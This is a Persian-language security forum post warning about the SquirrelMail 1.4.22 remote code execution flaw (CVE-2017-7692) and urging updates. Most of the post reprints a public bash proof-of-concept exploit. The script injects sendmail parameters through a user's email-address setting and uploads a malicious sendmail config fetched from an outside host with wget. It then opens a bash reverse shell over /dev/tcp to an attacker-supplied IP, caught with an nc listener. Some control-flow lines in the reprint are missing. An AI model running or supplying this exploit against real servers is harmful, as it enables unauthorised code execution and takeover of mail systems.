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موضوع: باگ جدید SquirrelMail به نام SquirrelMail 1.4.22 Remote Code Execution Vulnerability

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  1. #1
    عضو انجمن
    تاریخ عضویت
    Nov 2012
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    Lightbulb باگ جدید SquirrelMail به نام SquirrelMail 1.4.22 Remote Code Execution Vulnerability

    با سلام و درود.
    یک باگ جدید در SquirrelMail به نام SquirrelMail 1.4.22 Remote Code Execution توسط Dawid Golunski پابلیک شده است که در ورژن 1.4.22 و ورژن های قبلی کارایی دارد.
    SquirrelMail یکی از محبوب ترین برنامه تحت وب سایت ها برای ورود به ایمیل می باشد که با پابلیک شدن این باگ,لطفا آپدیت نمایید تا سرورها و سایت ها به مشکل نخورند.با اینکه طوری نیست که همه جا بشه کاری کرد.اما بازم برای امنیت بیشتر,این سرویس رو آپدیت کنید.
    اکسپلویت :
    # SquirrelMail 1.4.22 Remote Code Execution Vulnerability
         __                     __   __  __           __                 
        / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
       / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
      / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  ) 
     /_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/ 
    SquirrelMail <= 1.4.22 Remote Code Execution PoC Exploit (CVE-2017-7692)
    SquirrelMail_RCE_exploit.sh (ver. 1.0)
    Discovered and coded by 
    Dawid Golunski (@dawid_golunski)
    ExploitBox project:
    # Quick and messy PoC for SquirrelMail webmail application.
    # It contains payloads for 2 vectors:
    # * File Write
    # * RCE 
    # It requires user credentials and that SquirrelMail uses 
    # Sendmail method as email delivery transport
    # Full advisory URL:
    # https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html
    # Exploit URL:
    # https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh
    # Tested on: # Ubuntu 16.04 
    # squirrelmail package version:
    # 2:1.4.23~svn20120406-2ubuntu1.16.04.1 
    # Disclaimer:
    # For testing purposes only
    # -----------------------------------------------------------------
    # Interested in vulns/exploitation? 
    # Stay tuned for my new project - ExploitBox
    #                        .;lc'                          
    #                    .,cdkkOOOko;.                      
    #                 .,lxxkkkkOOOO000Ol'                   
    #             .':oxxxxxkkkkOOOO0000KK0x:'               
    #          .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.           
    #       ':oxxxxxxxxxxo;.       .:oOKKKXXXNNNNOl.        
    #      '';ldxxxxxdc,.              ,oOXXXNNNXd;,.       
    #     .ddc;,,:c;.         ,c:         .cxxc:;:ox:       
    #     .dxxxxo,     .,   ,kMMM0:.  .,     .lxxxxx:       
    #     .dxxxxxc     lW. oMMMMMMMK  d0     .xxxxxx:       
    #     .dxxxxxc     .0k.,KWMMMWNo :X:     .xxxxxx:       
    #     .dxxxxxc      .xN0xxxxxxxkXK,      .xxxxxx:       
    #     .dxxxxxc    lddOMMMMWd0MMMMKddd.   .xxxxxx:       
    #     .dxxxxxc      .cNMMMN.oMMMMx'      .xxxxxx:       
    #     .dxxxxxc     lKo;dNMN.oMM0;:Ok.    'xxxxxx:       
    #     .dxxxxxc    ;Mc   .lx.:o,    Kl    'xxxxxx:       
    #     .dxxxxxdl;. .,               .. .;cdxxxxxx:       
    #     .dxxxxxxxxxdc,.              'cdkkxxxxxxxx:       
    #      .':oxxxxxxxxxdl;.       .;lxkkkkkxxxxdc,.        
    #          .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.            
    #             .':oxxxxxxxxx.ckkkkkkkkxl,.               
    #                 .,cdxxxxx.ckkkkkxc.                   
    #                    .':odx.ckxl,.                      
    #                        .,.'.      
    # https://ExploitBox.io
    # https://twitter.com/Exploit_Box
    # -----------------------------------------------------------------
    echo -e "$int"
    #echo -e "\033[94m \nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \n"
    #echo -e "SquirrelMail_RCE_exploit.sh (ver. 1.0)\n"
    #echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m\n\n"
    # Base URL
    if [ $# -ne 1 ]; then
        echo -e "Usage: \n$0 SquirrelMail_URL"
        echo -e "Example: \n$0 http://target/squirrelmail/ \n"
        exit 2
    # Log in
    echo -e "\n[*] Enter SquirrelMail user credentials"
    read -p  "user: " squser
    read -sp "pass: " sqpass
    echo -e "\n\n[*] Logging in to SquirrelMail at $URL"
    curl -s -D /tmp/sqdata -d"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1" $URL/src/redirect.php | grep -q incorrect
    if [ $? -eq 0 ]; then
        echo "Invalid creds"
        exit 2
    sessid="`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"
    keyid="`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"
    # Prepare Sendmail cnf
    # * The config will launch php via the following stanza:
    # Mlocal,   P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,
    #       T=DNS/RFC822/X-Unix,
    #       A=php -- $u $h ${client_addr}
    wget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf
    # Upload config
    echo -e "\n\n[*] Uploading Sendmail config"
    token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"
    attachid="`curl -H "Expect:" -s -b"SQMSESSID=$sessid; key=$keyid" -F"smtoken=$token" -F"send_to=$mail" -F"subject=attach" -F"body=test" -F"attachfile=@/tmp/smcnf-exp" -F"username=$squser" -F"attach=Add" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}' | tr -d '\n'`"
    if [ ${#attachid} -lt 32 ]; then
        echo "Something went wrong. Failed to upload the sendmail file."
        exit 2
    # Create Sendmail cmd string according to selected payload
    echo -e "\n\n[?] Select payload\n"
    echo "1 - File write (into /tmp/sqpoc)"
    echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)"
    read -p "[1-2] " pchoice
    case $pchoice in
        1) payload="$squser@localhost   -oQ/tmp/    -X/tmp/sqpoc"
        2) payload="$squser@localhost   -oQ/tmp/    -C$sqspool/$attachid"
    if [ $pchoice -eq 2 ]; then
        read -p "Reverese shell IP: " reverse_ip
        read -p "Reverese shell PORT: " reverse_port
    # Reverse shell code
        \$cmd = \"/bin/bash -c 'bash -i >/dev/tcp/$reverse_ip/$reverse_port 0<&1 2>&1 & '\";
        file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export TERM=vt100 ;' . \$cmd);
        system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\");
    # Set sendmail params in user settings
    echo -e "\n[*] Injecting Sendmail command parameters"
    token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"
    curl -s -b"SQMSESSID=$sessid; key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" --data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null
    if [ $? -ne 0 ]; then
        echo "Failed to inject sendmail parameters"
        exit 2
    # Send email which triggers the RCE vuln and runs phprevsh
    echo -e "\n[*] Sending the email to trigger the vuln"
    (sleep 2s && curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid; key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" \
    -d"send_to=$squser@localhost" -d"subject=poc" --data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) &
    if [ $pchoice -eq 2 ]; then
        echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port"
        nc -vv -l -p $reverse_port
        echo -e "\n[*] The test file should have been written at /tmp/sqpoc"
    grep -q "302 Found" /tmp/sheaders
    if [ $? -eq 1 ]; then
        echo "There was a problem with sending email"
        exit 2
    # Done
    echo -e "\n[*] All done. Exiting"
    # Iranian Exploit DataBase = http://IeDb.Ir [2017-04-24]
    لینک :

    لطفا بروزرسانی انجام دهید و همچنین در سایت مرجع هم این بحث انجام شده است.
    با تشکر.

    منبع : تیم امنیتی,تیم هکری,تیم اکسپلویت iedb.Ir

  2. تعداد تشکر ها از IrIsT به دلیل پست مفید

اطلاعات موضوع

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  • شما نمیتوانید فایل پیوست کنید.
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